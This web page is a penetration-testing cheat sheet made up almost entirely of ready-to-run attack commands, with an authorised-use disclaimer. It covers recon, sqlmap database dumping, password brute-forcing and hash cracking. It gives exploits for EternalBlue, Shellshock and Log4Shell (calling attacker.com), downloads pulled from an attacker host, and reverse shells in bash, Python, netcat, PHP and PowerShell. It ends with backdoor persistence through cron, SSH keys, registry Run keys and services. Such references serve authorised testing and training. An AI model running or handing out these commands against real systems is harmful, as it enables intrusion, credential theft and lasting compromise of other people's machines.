Penetration Testing Cheat Sheet 2026: Security Assessment Guide

November 9, 2025

Comprehensive pentesting cheat sheet with tools for reconnaissance, scanning, exploitation, and post-exploitation. Includes nmap, Metasploit, and Burp Suite.

On This Page

Penetration Testing requires comprehensive knowledge of security tools and techniques. This pentesting cheat sheet covers essential commands for reconnaissance, vulnerability scanning, exploitation, privilege escalation, and post-exploitation. Includes nmap, Metasploit, Burp Suite, and more. For authorized security testing only.

Quick Navigation: Recon | Scanning | Exploitation | Post-Exploit | Persistence | Tools

Disclaimer

These tools and techniques are for authorized penetration testing, security research, and educational purposes only. Unauthorized access to computer systems is illegal.

Reconnaissance

Network Discovery

# Host discovery
nmap -sn 192.168.1.0/24               # Ping scan (no port scan)
nmap -sn -PS22,80,443 192.168.1.0/24  # TCP SYN ping
nmap -sn -PU53,161 192.168.1.0/24     # UDP ping

# Quick scan
nmap -T4 -F target                     # Fast scan (100 common ports)
nmap --top-ports 20 target             # Scan top 20 ports

# Comprehensive scan
nmap -sS -sV -O -p- -T4 target         # SYN scan, version, OS, all ports
nmap -A -T4 target                     # Aggressive scan
nmap -sC -sV target                    # Default scripts + version detection

Service Enumeration

# Banner grabbing
nc -v target 80                        # Manual banner grab
nmap -sV --version-intensity 5 target  # Aggressive version detection

# Specific services
nmap -p 445 --script smb-enum-shares target     # SMB shares
nmap -p 3306 --script mysql-info target         # MySQL info
nmap -p 1433 --script ms-sql-info target        # MSSQL info
nmap --script vuln target                        # Vulnerability scan

DNS Enumeration

# Zone transfer
dig axfr @ns1.target.com target.com
host -l target.com ns1.target.com

# Subdomain enumeration
fierce --domain target.com
amass enum -d target.com
subfinder -d target.com

# DNS brute force
dnsrecon -d target.com -t brt
dnsenum target.com

Web Reconnaissance

# Directory enumeration
gobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt
feroxbuster -u https://target.com -w wordlist.txt
dirbuster (GUI)

# Subdomain enumeration
gobuster vhost -u https://target.com -w subdomains.txt
ffuf -w subdomains.txt -u https://FUZZ.target.com

# Technology detection
whatweb target.com
wappalyzer (browser extension)

Vulnerability Scanning

Automated Scanners

# Nessus (commercial)
/opt/nessus/sbin/nessus-service

# OpenVAS
gvm-setup
gvm-start

# Nikto (web scanner)
nikto -h https://target.com

# Nuclei (template-based)
nuclei -u https://target.com
nuclei -l urls.txt -t cves/

Web Application Scanning

# OWASP ZAP
zaproxy

# Burp Suite
burpsuite

# SQLMap
sqlmap -u "https://target.com/page?id=1"
sqlmap -u url --dbs                    # Enumerate databases
sqlmap -u url -D dbname --tables       # Enumerate tables
sqlmap -u url -D dbname -T users --dump # Dump table

# XSS Testing
dalfox url https://target.com/search?q=FUZZ

Exploitation

Metasploit Framework

msfconsole                             # Start Metasploit

# Basic workflow
search exploit_name
use exploit/path/to/module
show options
set RHOSTS target
set LHOST attacker_ip
exploit

Common Exploits

# EternalBlue (MS17-010)
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS target
exploit

# Shellshock
curl -A "() { :; }; /bin/bash -c 'cat /etc/passwd'" https://target.com/cgi-bin/test.cgi

# Log4Shell (CVE-2021-44228)
# Payload: ${jndi:ldap://attacker.com/a}

Password Attacks

Hydra

# SSH brute force
hydra -l user -P passwords.txt ssh://target

# HTTP POST form
hydra -l admin -P passwords.txt target http-post-form "/login:username=^USER^&password=^PASS^:Invalid"

# FTP
hydra -L users.txt -P passwords.txt ftp://target

# RDP
hydra -l administrator -P passwords.txt rdp://target

John the Ripper

# Crack password hashes
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
john --show hashes.txt                  # Show cracked passwords

# Crack with rules
john --wordlist=wordlist.txt --rules hashes.txt

# Specific hash types
john --format=NT hashes.txt             # NTLM
john --format=raw-md5 hashes.txt        # MD5

Hashcat

# MD5
hashcat -m 0 hashes.txt wordlist.txt

# NTLM
hashcat -m 1000 hashes.txt wordlist.txt

# WPA/WPA2
hashcat -m 2500 capture.hccapx wordlist.txt

# With rules
hashcat -m 0 hashes.txt wordlist.txt -r rules/best64.rule

Post-Exploitation

Linux Privilege Escalation

# System enumeration
uname -a                               # Kernel version
cat /etc/issue                         # OS version
cat /etc/passwd                        # Users
cat /etc/shadow                        # Password hashes (if readable)
sudo -l                                # Sudo permissions

# Find SUID binaries
find / -perm -4000 2>/dev/null
find / -perm -u=s -type f 2>/dev/null

# World-writable files
find / -writable -type f 2>/dev/null

# Capabilities
getcap -r / 2>/dev/null

# Cron jobs
cat /etc/crontab
ls -la /etc/cron.*

# LinPEAS (automated)
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

Windows Privilege Escalation

# System info
systeminfo
whoami /priv
whoami /groups

# Find files
dir /s *pass* == *cred* == *vnc* == *.config*

# Unquoted service paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

# AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# WinPEAS (automated)
winpeas.exe

# PowerUp (PowerShell)
powershell -ep bypass
. .\PowerUp.ps1
Invoke-AllChecks

File Transfer

# HTTP server (attacker)
python3 -m http.server 8000
php -S 0.0.0.0:8000

# Download (victim Linux)
wget http://attacker:8000/file
curl http://attacker:8000/file -o file

# Download (victim Windows)
certutil -urlcache -f http://attacker:8000/file file.exe
powershell -c "(New-Object Net.WebClient).DownloadFile('http://attacker:8000/file','file.exe')"

# SCP
scp file user@target:/tmp/

# Base64 transfer
base64 file | nc target 4444           # Sender
nc -l 4444 | base64 -d > file          # Receiver

Shells & Backdoors

Reverse Shells

# Bash
bash -i >& /dev/tcp/attacker/4444 0>&1

# Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

# Netcat
nc -e /bin/sh attacker 4444

# PHP
php -r '$sock=fsockopen("attacker",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

# PowerShell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('attacker',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Listeners

# Netcat listener
nc -lvnp 4444

# Metasploit
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST attacker_ip
set LPORT 4444
exploit

Shell Upgrade

# Python PTY
python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
stty raw -echo
fg
export TERM=xterm

# Script
script /dev/null -c bash

Persistence

Linux

# SSH key
mkdir /root/.ssh
echo "ssh-rsa AAAA..." > /root/.ssh/authorized_keys

# Cron job
echo "* * * * * /tmp/.backdoor" > /etc/cron.d/persist

# .bashrc
echo "/tmp/.backdoor &" >> /root/.bashrc

Windows

# Scheduled task
schtasks /create /tn "Update" /tr C:\backdoor.exe /sc onlogon /ru System

# Registry run key
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Update /t REG_SZ /d "C:\backdoor.exe"

# Service
sc create backdoor binpath= "C:\backdoor.exe" start= auto
sc start backdoor

Useful Tools

# SearchSploit
searchsploit apache 2.4.49
searchsploit -m exploit_id              # Mirror exploit

# Exploit-DB
https://www.exploit-db.com/

# GTFOBins (Linux privilege escalation)
https://gtfobins.github.io/

# LOLBAS (Windows living-off-the-land)
https://lolbas-project.github.io/

# CrackStation (hash lookup)
https://crackstation.net/

# CyberChef (data manipulation)
https://gchq.github.io/CyberChef/

Reporting

Always document:

  • Scope and methodology
  • Findings with severity ratings
  • Proof of concept with screenshots
  • Remediation recommendations
  • Executive summary

📥 Download & Print

Want a PDF version? This cheat sheet is optimized for printing:

  1. Use your browser’s Print function (Ctrl/Cmd + P)
  2. Select “Save as PDF”
  3. Choose landscape orientation for best results

Stay Updated: Bookmark this page for the latest commands and best practices.

Last Updated: March 8, 2026